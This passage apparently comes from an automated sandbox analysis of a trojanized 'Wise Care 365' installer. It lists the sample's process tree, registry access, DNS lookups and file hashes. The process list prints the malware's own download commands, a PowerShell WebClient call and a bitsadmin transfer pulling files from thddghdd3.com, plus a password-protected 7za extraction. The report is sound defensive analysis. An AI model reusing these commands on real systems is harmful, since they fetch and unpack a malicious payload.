Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\ConsoleApp\7za.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target Count
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp N/A 2
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A 2
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A 60

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3848 wrote to memory of 3572 N/A C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp
PID 3572 wrote to memory of 748 N/A C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp C:\Windows\SysWOW64\cmd.exe
PID 3572 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 2380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 5048 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2600 wrote to memory of 3936 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\ConsoleApp\7za.exe
PID 2600 wrote to memory of 4500 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3572 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\Wise Care 365 5.9.1.582.exe
PID 888 wrote to memory of 4256 N/A C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\Wise Care 365 5.9.1.582.exe C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp

Processes

C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe

"C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe"

C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp

"C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp" /SL5="$80092,38098121,731648,C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\ControlSet000.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\main.bat" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thddghdd3.com/hfile.bin', 'hfile.bin')"

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /transfer Explorers /download /priority FOREGROUND http://thddghdd3.com/Telemetry.xml C:\Users\Admin\AppData\Local\Temp\Telemetry.xml

C:\ProgramData\ConsoleApp\7za.exe

7za.exe x -y -p1r7d2kvUf3 "*.7z"

C:\Windows\SysWOW64\timeout.exe

timeout /T 3 /NOBREAK

C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\Wise Care 365 5.9.1.582.exe

"C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\Wise Care 365 5.9.1.582.exe"

C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp

"C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp" /SL5="$802D0,36755997,64512,C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\Wise Care 365 5.9.1.582.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 thddghdd3.com udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 192.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp

MD5 f098bb35dca6ae44a05c65aac7a5444b
SHA1 c5c50d740c1b8e9d8715fc3b2c8026156295a437
SHA256 8a0163353bdcc0882008990b0479c571c91adaca143af8c03da145b28b02e1fe
SHA512 71d8fc99a67bfc1e2b3635db6092d51d2ae9ec47f652aa10234770e878ab8bfaad69f7b971d54169363763df59ebb33143d161cd2a1cb60bc6fa2bbe6ba0227b

C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

C:\ProgramData\ConsoleApp\ControlSet000.bat

MD5 484c8df5d5bd9d82f4ac1861472cf519
SHA1 eddc0d20c81d9dba14ee0be32c7c5f563481e792
SHA256 f240f76de7e18fd3344eb7e5f4d6976a33a331ca12d0aff18032ef99bb3bf953
SHA512 6cf730eb19d4b80ce045c17b8e162448d65219be0f0e04ee02245af157ffe9cceb235c182800f44d9260cfa49c44b8e7a8c0a8d1db174a8dad75c33f60bad2b7

C:\ProgramData\ConsoleApp\main.bat

MD5 0ddc6dd98f86cff7e50c1621fd16b55a
SHA1 27e61b2bf7a367c491f25a3ef70df2ef0e38c36a
SHA256 b0a5f27817ebca5a17f75d625f1c73dc0d1c2499f1d155916d5a404013856df6
SHA512 07cb691bb23bb75c2c72c3e915b7af1f8b8c831f3d77e81c67f95c5d1ec7f754a7b823b9f1cdecd5cc511a4c34a6e8f0938eaad52f8d6451fee973ecfd2b9609

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g1jgcp3q.1wi.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\ProgramData\ConsoleApp\7za.exe

MD5 c3d309156b8e8cf1d158de5fab1c2b40
SHA1 58ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256 993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA512 2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\Wise Care 365 5.9.1.582.exe

MD5 05fda662bb382c2c95b9318b2394b246
SHA1 69365314afb6102209a806e0e474d94e58207ec6
SHA256 1cdf90593f92f8de7a6a8b812756ff9359a0a9827f0843ef40e1983f17d6b8d2
SHA512 b8d792f5529672227b94c55a2e914b8bbc569d9ce70e5c17022a5568dc51febb4fb0a497009d4975f8dc7574989041edf093285d62c34f09d5d55da09869f312

C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp

MD5 9d7850e858c24db77b91b25adf93812f
SHA1 f0bb0a9074b38dad7492422247c0a316197d26b6
SHA256 c062235322d35c79cfde7aea5fd90e9589e5fbca738ed41ab66de382e1a1b2e8
SHA512 e08084f265913a71d55750b75bbb01d1c43baa68d57eb9d6bc4ed46076577536b10901c06b92c66a926e07e268593b69936050cfacb8ed8e62b8fad86444e8ec

C:\Users\Admin\AppData\Local\Temp\is-ABTGS.tmp\ISTask.dll

MD5 86a1311d51c00b278cb7f27796ea442e
SHA1 ac08ac9d08f8f5380e2a9a65f4117862aa861a19
SHA256 e916bdf232744e00cbd8d608168a019c9f41a68a7e8390aa48cfb525276c483d
SHA512 129e4b8dd2665bcfc5e72b4585343c51127b5d027dbb0234291e7a197baeca1bab5ed074e65e5e8c969ee01f9f65cc52c9993037416de9bfff2f872e5aeba7ec

C:\Users\Admin\AppData\Local\Temp\is-ABTGS.tmp\VclStylesInno.dll

MD5 b0ca93ceb050a2feff0b19e65072bbb5
SHA1 7ebbbbe2d2acd8fd516f824338d254a33b69f08d
SHA256 0e93313f42084d804b9ac4be53d844e549cfcaf19e6f276a3b0f82f01b9b2246
SHA512 37242423e62af30179906660c6dbbadca3dc2ba9e562f84315a69f3114765bc08e88321632843dbd78ba1728f8d1ce54a4edfa3b96a9d13e540aee895ae2d8e2
